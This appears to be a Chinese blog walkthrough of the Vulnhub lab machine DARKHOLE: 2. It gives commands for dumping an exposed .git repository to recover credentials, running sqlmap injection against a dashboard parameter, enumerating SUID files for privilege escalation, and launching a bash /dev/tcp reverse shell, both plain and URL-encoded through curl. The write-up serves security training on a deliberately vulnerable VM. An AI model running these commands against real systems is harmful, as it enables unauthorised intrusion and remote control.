Vulnhub-DARKHOLE-2

Administrator 字数: 29445 阅读耗时: 73 分钟 2022/12/02 博客独享热度: 10 评论: 0

title: 'Vulnhub-DARKHOLE: 2'
abbrlink: 334e7ff1
date: 2022-12-02 09:25:19

描述

Difficulty:Hard

This works better with VMware rather than VirtualBox

Hint: Don't waste your time For Brute-Force

nmap扫存活

kali 192.168.169.220
靶机  192.168.169.230

端口 22 80
 Git repository  git泄露

https://github.com/arthaud/git-dumper

python3 git_dumper.py http://192.168.169.230/.git/ website

一个登录页面 需要邮箱密码

查看修改历史

发现账号密码

```
if($_POST['email'] == "lush@admin.com" && $_POST['password'] == "321"){

看url 有注入点

sqlmap -u "http://192.168.169.230/dashboard.php?id=1" --cookie  PHPSESSID=3ca3jbi4mk3749bv84uu4supol  --dbs

ssh jehad@192.168.169.230

find / -user root -perm -4000 -print 2>/dev/null

cat  /etc/crontab

netstat -tlnp

可以运行cmd

bash -c 'bash -i >& /dev/tcp/192.168.169.220/6666 0>&1'

```
bash%20-c%20'bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.169.220%2F6666%200%3E%261'

curl "127.0.0.1:9999/?cmd=bash%20-c%20'bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.169.220%2F6666%200%3E%261'"